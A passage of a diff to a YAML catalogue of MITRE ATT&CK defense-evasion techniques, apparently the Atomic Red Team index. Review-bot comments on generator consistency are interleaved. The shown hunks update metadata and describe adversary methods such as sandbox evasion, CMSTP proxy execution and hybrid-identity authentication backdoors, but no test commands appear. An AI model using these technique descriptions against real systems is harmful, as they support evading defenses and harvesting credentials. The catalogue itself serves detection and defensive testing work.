+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
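Review bot: the new T1480.002 (Mutual Exclusion) entry ships with `x_mitre_detection: ''` and `atomic_tests: []`, and has no `identifier:` key before `atomic_tests`. The convention in this file is inconsistent on that point: T1497.003 and T1562.012 carry `identifier` with empty tests, while T1205 and T1218.015 do not, so confirm the omission here is generator behaviour for "no atomic YAML exists" and not a missed key. The description's Linux variant (acquire a lock on a mutex file, exit on failure) is covered by the `File: File Creation` data source, so the data-source list is consistent with the text.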
@@ -8321,57 +8473,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -8386,6 +8491,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -8395,9 +8506,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -8407,13 +8523,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
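Review bot: in the T1497.003 reference block the Deloitte `drive.google.com/file/d/...` URL gains an `/edit` suffix and a new retrieval date (September 13, 2024); `x_mitre_version` stays at 1.2 although `modified` moves to 2024-09-12, which is consistent since the only substantive changes in this object are reference ordering and that URL. The `x_mitre_modified_by_ref` line removed in the earlier hunk for this technique reappears here at the end of the object, so the field is moved, not lost.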
@@ -8459,8 +8611,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -8479,13 +8631,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
@@ -8658,7 +8809,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests:
- name: Disable Windows IIS HTTP Logging
@@ -8852,7 +9002,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -8891,8 +9041,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
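Review bot: for T1218.002 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed, and the same happens for Network Address Translation Traversal and T1207 below, whereas the T1553.003 and T1553.006 hunks keep `x_mitre_attack_spec_version: 2.1.0` and drop only `spec_version`. That leaves some 2.1.0-era objects with no attack spec version at all; unless the source objects genuinely lack the field, the generator should keep it everywhere or drop it everywhere.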
@@ -8943,7 +9091,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -8982,12 +9130,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -9014,6 +9160,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -9031,12 +9178,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
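Review bot: for T1550 the `Identity Provider` platform is added without a removed counterpart (`Azure AD` was not in the previous list), so this widens the technique's scope rather than just renaming, which the 1.3 to 1.4 version bump covers; the `Office 365`/`Google Workspace` to `Office Suite` collapse carries the same consumer-filter caveat as T1070.008 above.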
@@ -9062,18 +9209,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -9118,13 +9264,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests:
- name: Disable Microsoft Defender Firewall
@@ -9414,7 +9559,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -9447,7 +9592,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
@@ -9485,30 +9629,30 @@ defense-evasion:
elevation_required: true
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
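Review bot: the Azure AD to Entra ID rename in the T1556.007 description is applied to prose only; the citation key `Azure AD Hybrid Identity` and the literal service name `AzureADConnectAuthenticationAgentService` are correctly left untouched, since the former is resolved by `(Citation: ...)` markers and the latter is the actual Windows service name of the PTA agent. Keep it that way in any follow-up: a global search-and-replace would break both.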
@@ -9516,9 +9660,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -9527,21 +9671,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
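Review bot: the T1556.007 platform list drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`, with the version going to 1.1; `x_mitre_attack_spec_version`, contributors, domains and `x_mitre_modified_by_ref` are relocated from the end of the object to here, so the later hunk that deletes them at the bottom is the matching half of a move, not a loss. As with T1070.008 and T1550 above, consumers keyed on the old platform strings need updating.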
@@ -9581,9 +9726,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -9646,7 +9788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -9706,7 +9847,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -9747,7 +9887,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
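Review bot: `modified` moves backwards here (2022-05-11 to 2022-03-08) and in several later hunks, and the old values share the same `14:00:00.188Z` suffix across unrelated techniques, which suggests the previous import was batch-stamped and the new values come from upstream. Confirm which STIX source is authoritative, because a consumer that uses `modified` to decide whether an object changed will see these objects as older than its cached copy and may skip the update.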
@@ -9778,8 +9918,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests:
- name: DCShadow (Active Directory)
@@ -9963,7 +10101,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -9987,7 +10125,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests:
- name: Code Signing Policy Modification
@@ -10003,7 +10140,7 @@ defense-evasion:
elevation_required: true
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -10082,7 +10219,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -10167,7 +10303,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
@@ -11904,7 +12039,7 @@ defense-evasion:
elevation_required: true
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -11923,6 +12058,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -11930,7 +12066,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -11950,29 +12085,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -12039,7 +12176,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -12106,12 +12242,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -12147,6 +12282,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -12158,16 +12297,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -12203,12 +12338,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
